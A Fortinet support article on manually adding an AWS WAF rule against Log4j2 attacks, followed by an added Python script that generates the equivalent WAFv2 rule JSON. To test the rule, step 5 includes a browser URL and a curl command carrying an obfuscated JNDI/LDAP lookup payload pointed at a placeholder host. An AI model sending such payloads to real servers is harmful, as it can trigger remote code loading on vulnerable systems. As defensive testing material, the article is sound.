Description | This article describes how to manually create a custom signature on AWS WAF to block attacks on web servers hosted on AWS and using the Log4j2 library. This should be added on top of the Fortinet Managed Rules. |
Scope | |
Solution |
Please follow the steps below to manually configure a new security rule on AWS WAF:
1. Make sure the Fortinet rules are already in place. The following screenshots show the rules on AWS WAF v1 and v2 respectively. Using v2 is suggested, as it provides more powerful protection.
2. Now go to the Rules column of your Web ACL to add a new rule.
3. In Rule Builder, enter a name for the rule, then select Regular rule.
4. Scroll down and set your statements as shown in the screenshot.
Note: The regular expression is not listed in this article because it should not be exposed publicly, for security reasons. Please contact the Fortinet support team to get it. Because AWS WAF doesn't support all header inspection types automatically, you need to add the headers one by one with the same regex pattern. It's recommended to add at least the common headers such as Cookie, Referer, etc. The more, the better.
5. After configuring the rule, test it in the following way:
a. Use your browser to access an address like http://your-domain/?%24%7B%24%7Benv%3Afoo%3A-jndi%7D%3Aldap%3A%2F%2Ftest.example.com%2Fexp
A 403 error page will be returned if it works.
b. Use the command line tool curl to run:
$ curl 'http://your-domain/?%24%7B%24%7Benv%3Afoo%3A-jndi%7D%3Aldap%3A%2F%2Ftest.example.com%2Fexp'
The following output should print if it works
As variants continue to emerge, a more robust solution should be considered even if security rules are configured on AWS WAF. FortiWeb's SaaS-based WAF solution is a good complement. It protects public cloud hosted web applications from the OWASP Top 10, zero day threats, and other application layer attacks. Subscribe to it here: https://aws.amazon.com/marketplace/pp/prodview-rbkvcwsvcpgsk |
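Step 4 above, expressed as an AWS WAF v2 rule in JSON form and generated with Python (an added example, not Fortinet's own rule): the same regex pattern set is referenced once for the query string and once per header, combined with OR. The pattern set ARN is a placeholder, and the rule name, the headers beyond Cookie and Referer, and the URL_DECODE transformation are assumptions.

```python
import json

# Placeholder: ARN of a regex pattern set that holds the pattern obtained
# from Fortinet support (the pattern itself is not published in the article).
REGEX_SET_ARN = "arn:aws:wafv2:REGION:ACCOUNT_ID:regional/regexpatternset/NAME/ID"

# Assumed list; the article names Cookie and Referer and recommends adding more.
HEADERS = ["cookie", "referer", "user-agent", "x-forwarded-for", "authorization"]


def _statement(field_to_match):
    """One regex check against a single request component."""
    return {
        "RegexPatternSetReferenceStatement": {
            "ARN": REGEX_SET_ARN,
            "FieldToMatch": field_to_match,
            # Assumption: undo percent-encoding before matching, since the
            # article's test URL is percent-encoded.
            "TextTransformations": [{"Priority": 0, "Type": "URL_DECODE"}],
        }
    }


def build_rule(name="log4j2-custom", priority=0, headers=HEADERS):
    """Return a WAFv2 rule that blocks when any inspected component matches."""
    statements = [_statement({"QueryString": {}})]
    seen = []
    for header in headers:
        header = header.strip().lower()
        # Skip blanks and case-insensitive duplicates; each header gets one statement.
        if header and header not in seen:
            seen.append(header)
            statements.append(_statement({"SingleHeader": {"Name": header}}))
    return {
        "Name": name,
        "Priority": priority,
        "Statement": {"OrStatement": {"Statements": statements}},
        "Action": {"Block": {}},
        "VisibilityConfig": {
            "SampledRequestsEnabled": True,
            "CloudWatchMetricsEnabled": True,
            "MetricName": name,
        },
    }


if __name__ == "__main__":
    print(json.dumps(build_rule(), indent=2))
```

The printed JSON can be pasted into the rule JSON editor of the Web ACL once the placeholder ARN is replaced with that of your own regex pattern set.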
Copyright 2024 Fortinet, Inc. All Rights Reserved.